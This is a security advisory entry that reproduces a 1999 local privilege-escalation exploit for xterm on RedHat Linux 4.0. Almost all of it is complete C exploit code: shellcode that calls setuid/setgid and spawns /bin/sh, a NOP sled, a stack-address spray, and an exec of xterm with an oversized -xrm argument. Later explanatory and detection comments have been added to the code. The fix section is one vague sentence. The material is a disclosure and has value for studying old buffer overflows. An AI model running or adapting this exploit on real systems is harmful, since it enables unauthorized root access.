COMMAND

    xterm

SYSTEMS AFFECTED

    Linux RedHat

PROBLEM

    Taeho Oh posted the following.  It is an xterm exploit with which a local
    user can gain root access.  It was tested with RedHat 4.0.  The exploit
    follows:

    /*
    
	    xterm exploit code for x86 linux
    
	    Local user can gain root access.
    
	    Tested redhat linux : 4.0
    
	    Usage
	    $ xterm-ex 0
	               |
	               +------ try from -50 to 50 ( try in steps of 1 )
    
	    This program is for demonstrative use only.
	    USE IT AT YOUR OWN RISK!
    
	    Programmed by Taeho Oh 1999/04/25
    
    
    Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
    PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <syslog.h>
    
    #define OFFSET                          100   /* base distance subtracted from the stack pointer in main() */
    #define RET_POSITION                   1024   /* together with RANGE+1 gives the size of the -xrm argument buffer */
    #define RANGE                            20   /* slack around RET_POSITION; RANGE*2 also bounds the NOP run in main() */
    #define NOP                            0x90   /* x86 single-byte no-op used as filler */
    
    /*
     * Payload bytes; the per-instruction comments are the original author's.
     * Declared as 1024 bytes but only the initialiser is meaningful: main()
     * measures it with strlen(), so it must contain no embedded NUL byte.
     * The only string it carries is "/bin/sh" at the end.
     */
    char shellcode[1024]=
	    "\xeb\x31"                      /* jmp 0x31             */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\xb0\x17"                      /* movb $0x17,%al       */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\xb0\x17"                      /* movb $0x17,%al       */
	    "\x04\x17"                      /* addb $0x17,%al       */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x5e"                          /* popl %esi            */
	    "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
	    "\x31\xc0"                      /* xorl %eax,%eax       */
	    "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
	    "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
	    "\xb0\x0b"                      /* movb $0xb,%al        */
	    "\x89\xf3"                      /* movl %esi,%ebx       */
	    "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
	    "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
	    "\xcd\x80"                      /* int $0x80            */
	    "\x31\xdb"                      /* xorl %ebx,%ebx       */
	    "\x89\xd8"                      /* movl %ebx,%eax       */
	    "\x40"                          /* inc %eax             */
	    "\xcd\x80"                      /* int $0x80            */
	    "\xe8\xca\xff\xff\xff"          /* call -0x36           */
	    "/bin/sh";                      /* .string \"/bin/sh\"  */
    
    /*
     * Returns the current stack pointer. There is no return statement: the
     * inline asm copies %esp into %eax and the function relies on %eax being
     * the return register. That makes it x86-only and undefined behaviour in
     * standard C; an optimising compiler is free not to preserve %eax here.
     */
    unsigned long get_esp(void)
    {
	    __asm__("movl %esp,%eax");   /* the "result" is whatever the caller reads from %eax */
    }
    
    
    /*
     * Builds an oversized "-xrm" argument and execs the (presumably setuid)
     * xterm with it. The buffer is first filled with a guessed stack address
     * (sp - offset), then the front is overwritten with NOP bytes and the
     * payload is copied in just before the trailing address copies; argv[1]
     * adjusts the address guess (see the Usage note in the file header).
     *
     * Left as in the original posting, for the reader to be aware of:
     *  - `void main`, and strlen()/execle() called without prototypes
     *    (<string.h> and <unistd.h> are not included);
     *  - the loop bounds mix int with size_t (signed/unsigned comparison);
     *  - bsize (1045) is not a multiple of 4, so the address-fill loop stores
     *    3 bytes past the end of buff;
     *  - execle() expects a NULL argv terminator followed by envp, but only a
     *    single 0 is passed.
     * Detection stance: the observable artefact is xterm being started with a
     * ~1 KB "-xrm" argument consisting of 0x90 bytes and repeated 4-byte
     * address values.
     */
    void main(int argc,char **argv)
    {
	    char buff[RET_POSITION+RANGE+1],*ptr;   /* bsize bytes; buff[bsize-1] is the terminator */
	    long *addr_ptr,addr;                    /* addr: guessed stack address written across buff */
	    unsigned long sp;
	    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
	    int i;
    
	    printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	    printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	    printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");
    
	    /* optional argv[1] shifts the address guess; atoi() gives no error reporting */
	    if(argc>1)
		    offset+=atoi(argv[1]);
    
	    sp=get_esp();
	    addr=sp-offset;
    
	    /* fill the whole buffer with the guessed address, 4 bytes at a time */
	    ptr=buff;
	    addr_ptr=(long*)ptr;
	    for(i=0;i<bsize;i+=4)
		    *(addr_ptr++)=addr;
    
	    /* overwrite the front with NOP filler, leaving RANGE*2 + payload at the end */
	    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
		    buff[i]=NOP;
    
	    /* copy the payload in right after the NOP run */
	    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
	    for(i=0;i<strlen(shellcode);i++)
		    *(ptr++)=shellcode[i];
    
	    buff[bsize-1]='\0';   /* the argument must be a C string for exec */
    
	    /* the oversized resource string is passed as the -xrm value */
	    execle("/usr/X11R6/bin/xterm","xterm","-xrm",buff,0);
    }

SOLUTION
    
    I think the latest version fixes this.